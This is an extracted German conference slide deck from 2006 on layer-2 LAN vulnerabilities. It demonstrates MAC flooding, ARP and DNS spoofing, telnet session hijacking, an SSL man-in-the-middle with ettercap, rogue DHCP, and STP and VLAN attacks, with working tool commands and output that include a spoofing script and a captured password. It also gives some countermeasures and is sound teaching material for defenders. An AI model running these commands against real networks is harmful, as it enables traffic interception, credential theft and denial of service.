Schwachstellen in lokalen Netzwerken - 3C04 · • Die einzelnen physikalischen Kabel sind über...

IT-Symposium 2006

1www.decus.de

18. Mai 2006

© 2004 Hewlett-Packard Development Company, L.P.The information contained herein is subject to change without notice

Schwachstellen in lokalen Netzwerken

3C04

Andreas AurandNetwork Consultant NWCC, HP

May 18, 2006 Andreas Aurand, HP Network Competence Center 2

Shared Ethernet• Bus-Topologie. Alle Maschinen sind an einem

gemeinsam genutzten Bus angeschlossen.• Die einzelnen physikalischen Kabel sind über Hubs

verbunden, • Leiten jedes empfangene Paket an alle verfügbaren Ports weiter• Jedes System kann den gesamten Datenverkehr sehen

• Shared Ethernet bietet keine Sicherheit

Zielsystem00-00-F8-31-A4-2D

SenderAngreifer

Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.

Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben.

Paket zum Zielsystem 08-00-2B-01-02-03

Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.

IT-Symposium 2006

2www.decus.de

18. Mai 2006


Switched Ethernet• Systeme sind direkt am Switch angeschlossen. Leitet Pakete nur an Ports

weiter, an denen MAC-Adresse des Zielsystems eingetragen ist. • Diese Information ist in MAC-Adresstabelle gespeichert• Tabelle kann auf verschiedenen Switchtypen unterschiedliche Größe haben

• Falls MAC-Adresse unbekannt ist, muss Switch die entsprechenden Paketeüber alle Ports fluten. • Unicast Flooding: Fluten der Pakete im gesamten Layer-2-Netzwerk• Switch verhält sich wie ein Hub• Pakete sind für Angreifer sichtbar


Sender08-00-2B-05-67-87

Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.

Paket zum Zielsystem 00-00-F8-31-A4-2D

Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.

Port 2/17

Port Fa0/24


Switched Ethernet• Aufbau der MAC-Adresstabelle

• MAC-Adresse ist in der Tabelle vorhanden

Sender00-00-F8-31-A4-2D

Zielsystem08-00-2B-05-67-87

Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.

Port 2/17

Port Fa0/24

Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.


Sender08-00-2B-05-67-87

Paket zum Zielsystem 00-00-F8-31-A4-2D

Port 2/17

Port Fa0/24

Switch filtert Paket.

Switch filtert Paket.

# show mac-address-table address 0000.F831.A42DNon-static Address Table:Destination Address Address Type VLAN Destination Port------------------- ------------ ---- ----------------0000.f831.a42d Dynamic 1 FastEthernet0/24

IT-Symposium 2006

3www.decus.de

18. Mai 2006


Sniffing


Sniffing• Angreifer versucht, in Besitz von sensitiven Daten zu gelangen

• Passwörter, vertrauliche Daten usw.• Schnittstelle ist im Promiscuous Mode

Default GatewayIP: 10.185.208.190 / 21

MAC: 00-00-0C-07-AC-7B

Angreifer (Host attack)

IP: 10.185.208.189 / 21MAC: 00-60-97-80-9D-D6

IT-Symposium 2006

4www.decus.de

18. Mai 2006


Promiscuous Mode Scanner• Erkennen Schnittstellen, die im Promiscuous Mode laufen

• z.B. proDETECT, Promiscan, anti_sniff oder Cain


Cain - MAC Scanner• Host 192.168.28.198 nicht im Promiscuous Mode

• http://www.blackhat.com/html/bh-usa-01/bh-usa-01-speakers.html#Daiji%20Sanai

IT-Symposium 2006

5www.decus.de

18. Mai 2006


Cain - MAC Scanner• Host 192.168.28.198 im Promiscuous Mode


MAC-Angriffe

IT-Symposium 2006

6www.decus.de

18. Mai 2006


MAC Flooding• Angreifer versucht die MAC-Adresstabelle aufzufüllen

• Tools: macof oder pktgen

Angreifer"attack"

Pakete mit unterschiedlichen MAC-QuelladressenPakete mit unterschiedlichen MAC-Quelladressen

2/17

Rechner C

Rechner ACat2924CCat5000

Paket für Rechner CPaket für Rechner C Paket für R

echner CP

aket für Rechner C

Paket für R

echner CP

aket für Rechner C

Rechner B

Paket für Rechner CPaket für Rechner C2/18

Fa0/241/2

linny:~ # macof -i eth1 -n 150000macof: c:55:87:40:a3:81 -> 6a:b2:2a:33:a4:d6macof: 2e:4d:22:56:a2:e5 -> 31:cc:e:1e:5b:6macof: 3d:20:31:22:f6:c6 -> 43:a2:31:46:e0:c3

cat5000> (enable) show cam count dynTotal Matching CAM Entries = 130904


MAC Flooding• Überlauf der Forwarding-Tabelle über SNMP auslesen

• .iso.org.dod.internet.mgmt.mib-2.dot1dBridge.dot1dTp.dot1dTpLearnedEntryDiscards

# macof -i eth1 -n 100000 >/dev/null 2>&1 &# snmpget -c public 10.185.208.1 mib-2.17.4.1.0 (mib-2 = 1.3.6.1.2.1)SNMPv2-SMI::mib-2.17.4.1.0 = Counter32: 4427

IT-Symposium 2006

7www.decus.de

18. Mai 2006


MAC Spoofing• Angreifer verwendet MAC-Adresse eines bekannten Systems

• Angreifer kann Pakete nicht an das Zielsystem weiterleiten• DoS-Angriff oder Rogue Server

attack# macchanger --mac=00:10:7b:36:4e:80 eth0Current MAC: 00:60:97:80:9d:d6 (3com Corporation)Faked MAC: 00:10:7b:36:4e:80 (Cisco Systems, Inc.)

Default GatewayIP: 192.168.28.10

MAC: 00:10:7b:36:4e:80

Angreifer IP: 192.168.28.196

MAC: 00:60:97:80:9d:d6

Pakete mit Quelladresse: 00:60:97:80:9d:d6Pakete mit Quelladresse: 00:60:97:80:9d:d6

3/13

3/15

HTTP ServerIP: 10.185.208.185

MAC: 00-00-F8-71-2E-B3

3/13

3/15

http://10.185.208.185/http://10.185.208.185/

Angreifer IP: 10.185.208.189

MAC: 00:04:c1:7d:d6:54

Pakete mit Quelladresse: 00-00-F8-71-2E-B3Pakete mit Quelladresse: 00-00-F8-71-2E-B3


ARP Spoofing

IT-Symposium 2006

8www.decus.de

18. Mai 2006


Wie funktioniert der ARP Cache ?

Ja

Nein

Ja

Nein

Protokolltypunterstützt ?Protokolltypunterstützt ?

Merge_Flag := FalseMerge_Flag := False

Eintrag fürSenderpaar imARP Cache ?

Eintrag fürSenderpaar imARP Cache ?

Neuen Eintrag im ARP Cache anlegenNeuen Eintrag im

ARP Cache anlegen

IP-Adresse desZielsystems =lokale Adresse

IP-Adresse desZielsystems =lokale Adresse

Eintrag im ARP Cacheerneuern

und Merge_Flag := True

Eintrag im ARP Cacheerneuern

und Merge_Flag := True

Ja

Ja

Nein

Nein

1

2

Operation-Feld aufares_op$REPLY setzen

Operation-Feld aufares_op$REPLY setzen

Handelt es sich um einen

Request ?

Handelt es sich um einen

Request ?

Lokale HW- und Protokolladresse in die Senderfelder eintragen

Lokale HW- und Protokolladresse in die Senderfelder eintragen

Ja

Reply-Paket als Unicast an HW-Adresse des Zielsystems senden

Reply-Paket als Unicast an HW-Adresse des Zielsystems senden

Nein

Merge Flag = False ?

Merge Flag = False ?

Der ARP Reply wird immer als Unicast an die MAC-Adresse gesendet, die im Request-Paket als „Sender MAC Address“eingetragen ist.


ARP Spoofing• Bestehende Einträge im ARP Cache durch „gefälschte“ ARP-

Pakete modifizieren und neue Einträge hinzufügen

• ARP Spoofing oder ARP Cache Poisoning

• Ermöglicht DoS- und MitM-Attacken

• Gratuitous ARP• ARP Reply Broadcast um einen bestehenden Eintrag auf

allen Systemen des LANs abzuändern• Häufig benutzt, um ARP-Eintrag des Default Gateway

auf allen Hosts eines Subnetzes zu modifizieren

IT-Symposium 2006

9www.decus.de

18. Mai 2006


arpspoof

attack# arpspoof -i eth0 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: ff:ff:ff:ff:ff:ffAddress Resolution Protocol (reply)

… … …Opcode: reply (0x0002)Sender MAC address: 00:60:5c:f4:72:6fSender IP address: 192.168.28.254Target MAC address: ff:ff:ff:ff:ff:ff (Broadcast)Target IP address: 0.0.0.0 (0.0.0.0)

attack# arpspoof -i eth0 -t 192.168.28.197 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: 00:00:f8:71:2e:b3Address Resolution Protocol (reply)

… … …Opcode: reply (0x0002)Sender MAC address: 00:60:97:80:9d:d6Sender IP address: 192.168.28.254)Target MAC address: 00:00:f8:71:2e:b3 Target IP address: 192.168.28.197

# arp -a 192.168.28.254192.168.28.254 at 00:60:97:80:9D:D6

AngegriffeneRechner

IP: 192.168.28.197

Default GatewayIP: 192.168.28.254

MAC: 00-60-5c-f4-72-6f


IP: 192.168.28.196MAC: 00-60-97-80-9D-D6

Angriff über ARP Request oder ReplyAngriff über ARP Request oder Reply

Gratuitous ARP wird als Broadcast gesendet.


Session Hijacking

IT-Symposium 2006

10www.decus.de

18. Mai 2006


Session Hijacking

• Angreifer verwendet hunt, um eine bestehende Verbindung zu übernehmen.• hunt wiederum benutzt ARP Spoofing, um die Pakete umzuleiten

Angreifer

Client192.168.28.197

Router192.168.28.254

ARP Reply (IP: 192.168.28.197 MAC: EA:1A:DE:AD:BE:01)ARP Reply (IP: 192.168.28.254 MAC: EA:1A:DE:AD:BE:02)ARP Reply (IP: 192.168.28.197 MAC: EA:1A:DE:AD:BE:01)ARP Reply (IP: 192.168.28.254 MAC: EA:1A:DE:AD:BE:02)

Telnet Session zum Router wird vom Angreifer übernommen


Session Hijacking mit hunt--- Main Menu --- rcvpkt 1148, free/alloc 63/64 ---Y---l/w/r) list/watch/reset connectionsu) host up testsa) arp/simple hijack (avoids ack storm if arp used)s) simple hijackd) daemons rst/arp/sniff/maco) optionsx) exit*> l1) 192.168.28.208 [1253] --> 192.168.28.185 [23]2) 192.168.28.197 [49230] --> 192.168.28.254 [23]--- Main Menu --- rcvpkt 2528, free/alloc 63/64 ---Y---… … …a) arp/simple hijack (avoids ack storm if arp used)… … …-> a0) 192.168.28.208 [1253] --> 192.168.28.185 [23]1) 192.168.28.197 [49230] --> 192.168.28.254 [23] choose conn> 1hosts already ARP spoofedinput mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>dump connectin y/n [y]>dump [s]rc/[d]st/[b]oth [b]>print src/dst same characters y/n [n]>CTRL-C to breakeennaa

Password: crouter#

Angreifer bekommt die komplette Telnet-Verbindung zwischen dem Host und dem Router angezeigt.

IT-Symposium 2006

11www.decus.de

18. Mai 2006


Session Hijacking mit hunt• Mit der Tastenkombination "CTRL C" übernimmt hunt die Telnet-Verbindung

-- press any key>you took over the connectionCTRL-] to breaknixat2# show user

Line User Host(s) Idle Location0 con 0 idle 2d00h

* 2 vty 0 idle 00:00:00 client.frs-lab.de

• Mit der Tastenkombination “CTRL ]“ gibt hunt die Session wieder freirouter#[r]eset connection/[s]ynchronize/[n]one [r]> suser have to type 16 chars and print 424 chars to synchronize connectionCTRL-C to break 1234567890123456done

• Synchronisation der Verbindung auf der Client-Seitemsg from root: power failure - try to type 16 chars 1234567890123456power failure detected... power resumed, ok

Zu diesem Zeitpunkt hat der Angreifer die Telnet-Verbindung übernommen

Damit die Sequenznummern der Telnet-Verbindung wieder synchronisiert sind, bekommt der Anwender auf dem Client eine Meldung, um die fehlenden Zeichen einzugeben.


SSL Man-in-the-Middle Angriff

IT-Symposium 2006

12www.decus.de

18. Mai 2006


Sicherheitslücke: MitM-Attacke• Diffie-Hellman und RSA-Verschlüsselung sind anfällig für MitM-Attacken• Authentizität der Partner muss überprüft werden

• bei SSL über Gültigkeit des Server-Zertifikats• bei SSH über Verifikation des Server Key

HTTPS Server

Angegriffener Rechner(Host mpdepp)

192.168.28.199 / 24


192.168.28.197 / 24

SSL Session zwischen dem Client und dem Angreifer.

SSL Session zwischen dem Angreifer und dem eigentlichen Server.



SSL MitM-Attacke mit Ettercap• Verwendet ARP Spoofing um die Verbindung umzuleiten• Das verwendete Zertifikat ist fast identisch mit dem Original-Zertifikat

attack:/ # ettercap -T -i eth0 \--mitm arp:remote /192.168.28.254/80,443 /192.168.28.199/ … … …2 hosts added to the hosts list...ARP poisoning victims:GROUP 1 : 192.168.28.254 00:10:7B:3B:5C:A1GROUP 2 : 192.168.28.199 00:00:F8:70:7C:86

Starting Unified sniffing...… … …==================================================IP address : 10.38.89.169DISTANCE : 1TYPE : REMOTE hostFINGERPRINT :OPERATING SYSTEM : UNKNOWNPORT : TCP 443 | https [Apache/1.3.26 (OpenVMS) mod_ssl/2.8.10 OpenSSL/0.9.7d]

ACCOUNT : andreas / geheim (192.168.28.199)INFO : https://boerse.frs-lab.de/login.html

==================================================

Inline help:

[vV] - change the visualization mode[pP] - activate a plugin[lL] - print the hosts list[oO] - print the profiles list[cC] - print the connections list[sS] - print interfaces statistics[<space>] - stop/cont printing packets[qQ] - quit

IT-Symposium 2006

13www.decus.de

18. Mai 2006


SSL MitM-Attacke mit Ettercap• Warnung beim Aufruf der Seite

• Unbekannte Zertifizierungsstelle


SSL MitM-Attacke mit Ettercap• Ettercap verwendet fast identisches Zertifikat

• Fingerprint stimmt nicht • X.500-Name des Herausgeber ist modifiziert (Leeres L-Feld)

IT-Symposium 2006

14www.decus.de

18. Mai 2006


SSL MitM-Attacke mit Ettercap• Vergleich mit dem Original-Zertifikat


Schutz gegen Pharming und Phising• Petname Tool für Firefox

• http://petname.mozdev.org/• Using the petname tool, you can save a

reminder note about a relationship you have with a secure site.

• The petname tool will then automati-cally display this reminder note every time you visit the site.

• After following a hyperlink, you need only check that the expected reminder note is being displayed.

• If so, you can be sure you are using the same site you have in the past.

• Phishing mit gültigem Zertifikat• http://www.heise.de/security/news/meldung/

69598

IT-Symposium 2006

15www.decus.de

18. Mai 2006


DNS Spoofing


DNS Spoofing• Oft für Man-in-the-Middle-Attacken benutzt

• Verschlüsselte Verbindungen terminieren angreifendem Rechner• SSH• HTTPS

• Angreifer beantwortet DNS Query mit eigenem DNS Response• Reply-Adresse ist seine eigene IP-Adresse

• Angreifer muss DNS Queries empfangen können• ARP Spoofing

• MAC Flooding

IT-Symposium 2006

16www.decus.de

18. Mai 2006


DNS SpoofingServer

(Host www.bank.de)10.185.208.186

Angegriffener RechnerIP: 10.205.210.127 / 21

MAC: AA-00-04-00-37-FD


IP: 10.205.208.189 / 21MAC: 00-60-97-80-9D-D6 DNS Response (Host: www.bank.de, IP: 10.185.208.186)DNS Response (Host: www.bank.de, IP: 10.185.208.186)

DNS Queries gehen immer zuerst zum Angreifer.

Session zwischen dem Angreifer und dem eigentlichen Server

DNS Query (Host: www.bank.de)DNS Query (Host: www.bank.de)

Die DNS Response des Angreifers enthält seine IP-Adresse.


MAC: 00-00-F8-71-2E-B3

DNS Server 10.34.93.242


dnsspoof (dsniff-Tool)• Script für DNS Spoofing

attack# cat mitm## Enable Forwarding and disable sending ICMP Redirects#echo "1" > /proc/sys/net/ipv4/ip_forwardecho "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects## Enable ARP and DNS Spoofing#arpspoof -i eth0 10.205.208.1 2>/dev/null &dnsspoof -i eth0 -f dnsspoof.hosts host 10.205.210.127 2>/dev/null &

# cat dnsspoof.hosts10.205.208.189 www.bank.de

IP-Adresse des Default Gateway

IP-Adresse des angegriffenen Rechners

IP-Adresse, die vom Angreifer als Reply auf einen DNS Request für www.bank.de zurückgesendet wird.

IT-Symposium 2006

17www.decus.de

18. Mai 2006


DHCP-Angriffe


DHCP Rogue Server• Angreifer setzt eigenen DHCP-Server ab um Clients mit

falschen Informationen zu versorgen. • Ermöglicht DoS- als auch MitM-Attacken• Falls DHCP Client die IP-Adresse vorgibt, funktioniert Angriff nicht

Default Gateway192.168.1.1 Angegriffener

DHCP Client

NormalerDHCP Server 192.168.1.2

DHCP Offer mit 192.168.1.185 als Default Gateway

DHCP Offer mit 192.168.1.185 als Default Gateway

Alle vom Client gesendeten Pakete gehen über den Angreifer.

Rückverkehr geht vom Default Gateway direkt zum Client.

AngreifenderRogue Server 192.168.1.185

IT-Symposium 2006

18www.decus.de

18. Mai 2006


attack# ./Gobbler -m 1 -D 192.168.1.185 -G 192.168.1.185 -A 192.168.1.33DHCP gobbler v0.66 from www.networkpenetration.com--------------------------------------------------Man the middle attackTrying to gobble address to be used in man in the middle attackDHCP Discover packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP OFFER packetDHCP request packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP ACK packet192.168.1.113 gobbled.... Total: 1Address(es) to be spoofed 192.168.1.113Sniffing for discover messagesSniffing DHCP packets.....Got A DHCP discover packet..... a host is trying to find a valid IPTime to do the dirty workDHCP Offer packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....got a dhcp request packetTransaction compare passed...Request IP: 192.168.1.113Offerd IP: 192.168.1.113Sent + Requested IP's match.... sending ackCreating an Ack packetDHCP ACK packet constructed and injected, wrote all 342 bytesMan in the middle should be established m00 m4m4m4m4Just checking incase of other servers weren't happy (waiting for 10 seconds)

Sniffing DHCP packets.....

DHCP Gobbler

Rogue Server allokiert eine Adresse vom richtigen DHCP-Server.

Wenn Client ein DHCP Discover sendet, schickt Rogue Server ein DHCP Offer mit der gestohlenen IP-Adresse sowie den Informationen über das neue Default Gateway und den neuen DNS-Server an Client zurück.

IP-Adressen für Gateway (G), DNS-Server (D) und DHCP-Server (A)


DHCP Starvation• Angreifer “spooft” den DHCP Packet Exchange

• Fordert alle verfügbaren IP-Adressen vom Servers an

• Server kann Clients keine Adresse mehr zuweisen• DoS-Attacke auf den DHCP-Server.

attack# DHCPGobbler -gDetecting DHCP service for gobble attackDHCP server at 1A92.168.1.190 offering 192.168.1.101 with subnet mask 255.255.255.0 gateway 192.168.1.1 and DNS 10.185.208.34192.168.1.101 gobbled using MAC 0:28:c:a8:5e:a7192.168.1.102 gobbled using MAC 0:a8:25:24:5e:51192.168.1.103 gobbled using MAC 0:48:c4:b3:a9:a0192.168.1.104 gobbled using MAC 0:3c:63:ab:41:f3192.168.1.105 gobbled using MAC 0:73:92:a7:75:1b….

DHCP-Server192.168.1.190

Angreifer

Da DHCP-Server seine ganzen Adressen vergeben hat, kann er DHCP Requests der Clients nicht mehr beantworten.

DHCP RequestDHCP Request

Vorgetäuschter DHCP-PaketaustauschVorgetäuschter DHCP-Paketaustausch DHCP Clients

Für jede Anforderung muss eine neue MAC-Adresse verwendet werden

IT-Symposium 2006

19www.decus.de

18. Mai 2006


Spanning Tree und andere VLAN-Attacken


STP-Attacken – DoS-Angriff• Angreifer sendet Bridge PDUs die dazu führen, dass die

Switches den Spanning Tree neu berechnen müssen• Durch Learning/Listening Phasen sind Teile des Netzes für

mindestens 30 Sekunden nicht erreichbar

Port: 1/1Port Cost: 100Designated Port 10.185.208.189

Port: 2/9Port Cost: 100

Forwarding Portgeht auf Blocking.

Fa0/35000Sup15000-Sup2

Port: 1/2Port Cost: 100

Root Port

Port: 1/2Port Cost: 100Root Port

Cat2924Port: Fa0/24Port Cost: 100Designated Port

Port: Fa0/22Port Cost: 100

Designated Port

AngreiferAngreifer STP Priorität 0Cat5000-Sup2 STP Priorität 8192Cat5000-Sup1 STP Priorität 16384Cat2924 STP Priorität 32768

B P D

UB

P D U

Switch setzt den geblockten Port zuerst für 30 Sekunden auf Listening/Learningbevor er auf Forwarding geht.

Port: Fa0/9Port Cost: 100Root Port

IT-Symposium 2006

20www.decus.de

18. Mai 2006


STP-Attacken – MitM-Angriff• Der Angreifer benötigt in diesem Fall

Verbindungen zu verschiedenen Switches

Port: 1/1Designated Port

eth0 eth1

Port: 2/1Root Port

Port: Fa0/24

Port: Fa0/9Root Port

Port: 1/1Root Port

Port: 2/9Designated Port

Angreifer

Port: Fa0/22Designated Port

Port: 1/25000-Sup2

Forwarding Port geht auf Blocking

Cat29245000Sup1

10.185.208.190

10.185.208.175

B P D

UB

P D U

Angreifer Priorität 1Cat5000-Sup2 Priorität 8192Cat5000-Sup1 Priorität 16384Cat2924 Priorität 32768


VLAN Hopping – Switch Spoofing• Standardmäßig stehen Switchports auf Trunk Mode „auto“

• Mit gefälschten DTP-Paketen (Dynamic Trunking Protocol) kann Angreifer Trunk-Verbindung (IEEE 802.1Q) zum Switch aufbauen• Zugriff auf alle VLANs möglich

Console> (enable) show trunk 3/3Port Mode Encapsulation Status Native vlan-------- ----------- ------------- ------------ -----------3/3 auto negotiate not-trunking 1

DTP Modus „auto“

Verbindung wird durch DTP als Trunk konfiguriert und Angreifer erhält Zugang zu allen VLANs.

IT-Symposium 2006

21www.decus.de

18. Mai 2006


VLAN Hopping – Double Tagging• Frame mit zwei IEEE 802.1Q VLAN Header

• Access Port und Native VLAN des Trunk müssen zum gleichen VLAN gehören

• Quell- und Zielmaschinen müssen an verschiedenen Switches angeschlossen sein

Native VLAN der Trunk-Verbindung muss VLAN 1 sein.

802.1 Q | Daten802.1 Q | Daten DatenDaten

VLAN 5

VLAN 1

802.1 Q | Daten802.1 Q | Daten

VLAN 1 VLAN 1

802.1 Q | 802.1Q

802.1 Q | 802.1Q


VTP-Angriffe• Über VTP (VLAN Trunking Protocol) tauschen Catalyst

Switches Informationen über ihre VLAN-Konfiguration aus• Läuft nur über Trunk Ports

• Durch das Versenden von gefälschten VTP-Paketen kann ein Angreifer VLANs hinzufügen oder Löschen (DoS-Angriff)

VTP Domainfrslab

DTP- und VTP-PaketeDTP- und VTP-Pakete

10.185.208.2 Cat5000-SUP1> (enable) show logging buffer2003 Sep 01 14:05:38 %VTP-6-VLANCHG:VLAN 5 deleted2003 Sep 01 14:05:39 %VTP-6-VLANCHG:VLAN 95 deleted2003 Sep 01 14:05:40 %VTP-6-VLANCHG:VLAN 96 deleted2003 Sep 01 14:05:41 %VTP-6-VLANCHG:VLAN 97 deleted2003 Sep 01 14:05:42 %VTP-6-VLANCHG:VLAN 98 deleted2003 Sep 01 14:05:43 %VTP-6-VLANCHG:VLAN 999 deleted2003 Sep 01 14:05:43 %VTP-6-VLANCHG:VLAN 1003 modified

IT-Symposium 2006

22www.decus.de

18. Mai 2006


Andere LAN-Attacken

• Spanning-Tree-Attacken• Schutz durch richtige Konfiguration der Switches

• Festlegen an welchen Ports andere Switches angeschlossen werden dürfen

• Festlegen über welche Ports die Root Bridge gesehen werden darf

• VLAN-Attacken• Schutz durch richtige Konfiguration der Switches

• Eigenes VLAN für Trunk-Verbindungen

• VLAN 1 nicht verwenden


Yersinia• Ermöglicht die folgenden Layer-2-Attacken:

• Spanning Tree Protocol (STP)• Cisco Discovery Protocol (CDP)• Dynamic Trunking Protocol (DTP)• Dynamic Host Configuration Protocol (DHCP)• Hot Standby Router Protocol (HSRP)• IEEE 802.1Q • Inter-Switch Link Protocol (ISL)• VLAN Trunking Protocol (VTP)• www.yersinia.net

IT-Symposium 2006

23www.decus.de

18. Mai 2006


Yersinia• Switchport auf Trunking setzen

cat5000-sup2> (enable) show trunk 2/2 detail* - indicates vtp domain mismatchPort Mode Encapsulation Status Native vlan-------- ----------- ------------- ------------ -----------2/2 auto negotiate not-trunking 1

Port Peer-Port Mode Encapsulation Status-------- --------- ----------- ------------- ------------2/2 unknown unknown unknown unknown

2006 Apr 18 14:04:20 MET-DST +02:00 %DTP-5-TRUNKPORTON:Port 2/2 has become dot1q trunk

cat5000-sup2> (enable) show trunk 2/2 detail* - indicates vtp domain mismatchPort Mode Encapsulation Status Native vlan-------- ----------- ------------- ------------ -----------2/2 auto n-dot1q trunking 1

Port Peer-Port Mode Encapsulation Status-------- --------- ----------- ------------- ------------2/2 unknown desirable dot1q not-trunking

attack# yersinia dtp -i eth0 -attack 2 -smac 00:00:F8:71:2E:B3 -d mac 01:00:0C:CC:CC:CC \-domain frslab \-neighbor 00:00:F8:71:2E:B3


Fragen ????????• http://www.dpunkt.de/buch/3-89864-297-6.html

Schwachstellen in lokalen Netzwerken - 3C04 · • Die einzelnen physikalischen Kabel sind über...

Documents

Transcript of Schwachstellen in lokalen Netzwerken - 3C04 · • Die einzelnen physikalischen Kabel sind über...